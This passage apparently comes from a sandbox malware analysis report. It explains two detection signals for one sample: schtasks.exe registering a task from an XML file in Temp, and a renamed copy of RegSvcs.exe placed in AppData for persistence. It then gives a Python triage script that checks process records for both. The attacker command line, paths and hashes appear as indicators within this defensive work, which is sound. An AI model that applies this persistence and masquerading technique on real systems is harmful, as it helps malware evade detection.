                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
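
Two details in the process list above are worth keying detection on. First, schtasks.exe is invoked with /Create and a task definition imported via /XML from a file in the user's Temp directory, the classic loader pattern that lets the definition be deleted right after registration. Second, the persistence binary C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe has the same size (45152 bytes) and MD5 (2867A3817C9245F7CF518524DFD18F28) as C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, so it is a renamed copy of the legitimate .NET host rather than a new payload: a hash blocklist built from the dropped file would block RegSvcs.exe itself, and the useful signal is the location and the task creation, not the hash. The Python below is an added example, not code from the report; it runs both checks over process records constructed from the entries above (conhost.exe omitted), accepting either the single quotes the report uses or the double quotes seen in real Windows command lines.

```python
import re

# Process records constructed from the System Behavior entries above
# (conhost.exe entries omitted); the field values are the report's own.
PROCESSES = [
    {"start": "08:24:54",
     "image": r"C:\Users\user\Desktop\QUOTATION REQUEST.exe",
     "cmdline": r"'C:\Users\user\Desktop\QUOTATION REQUEST.exe'",
     "md5": "4F4F697ADC79894CEEC42D5752B2790E", "size": 1733120},
    {"start": "08:25:01",
     "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GtVSibeZGs' /XML 'C:\Users\user\AppData\Local\Temp\tmpCA2.tmp'",
     "md5": "15FF7D8324231381BAD48A052F85DF04", "size": 185856},
    {"start": "08:25:02",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "cmdline": "{path}",  # the report shows only this placeholder for the command line
     "md5": "2867A3817C9245F7CF518524DFD18F28", "size": 45152},
    {"start": "08:25:30",
     "image": r"C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe",
     "cmdline": r"'C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe'",
     "md5": "2867A3817C9245F7CF518524DFD18F28", "size": 45152},
]

# Lower-cased path fragments that identify a temp directory.
TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")


def schtasks_import_from_temp(rec):
    """Sigma-style check: schtasks.exe /Create importing its task definition (/XML)
    from a temp directory. Returns the task name and XML path on a hit, else None."""
    image = rec["image"].lower()
    cmd = rec["cmdline"]
    if not image.endswith("\\schtasks.exe") or not re.search(r"/create\b", cmd, re.IGNORECASE):
        return None
    # value after /XML, with or without single or double quotes around it
    m = re.search(r"/xml\s+[\"']?([^\"']+?)[\"']?(?:\s|$)", cmd, re.IGNORECASE)
    if not m or not any(t in m.group(1).lower() for t in TEMP_DIRS):
        return None
    name = re.search(r"/tn\s+[\"']?([^\"']+?)[\"']?\s", cmd, re.IGNORECASE)
    return {"task": name.group(1) if name else None, "xml": m.group(1)}


def copies_of_windows_binaries(records):
    """Executables run from a user profile whose MD5 equals that of a binary run from
    the Windows directory: the same file under a new name and path. Returns
    (profile_copy, windows_original) pairs."""
    windows_by_md5 = {}
    for rec in records:
        if rec["image"].lower().startswith("c:\\windows\\"):
            windows_by_md5.setdefault(rec["md5"].lower(), rec["image"])
    hits = []
    for rec in records:
        if "\\users\\" in rec["image"].lower() and rec["md5"].lower() in windows_by_md5:
            hits.append((rec["image"], windows_by_md5[rec["md5"].lower()]))
    return hits


def triage(records):
    """Run both checks over a set of process records and return (rule, detail) pairs."""
    findings = []
    for rec in records:
        hit = schtasks_import_from_temp(rec)
        if hit:
            findings.append(("schtasks_xml_from_temp", hit["task"]))
    for copy_path, _original in copies_of_windows_binaries(records):
        findings.append(("windows_binary_copied_to_profile", copy_path))
    return findings


if __name__ == "__main__":
    for rule, detail in triage(PROCESSES):
        print(rule, detail)
```

The hash comparison only works when the records include the original Windows-directory execution, which they do here because RegSvcs.exe ran from its proper path first; on an endpoint, compare against a catalogue of known Microsoft binary hashes instead of other events in the same window.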

                                                                Disassembly

                                                                Code Analysis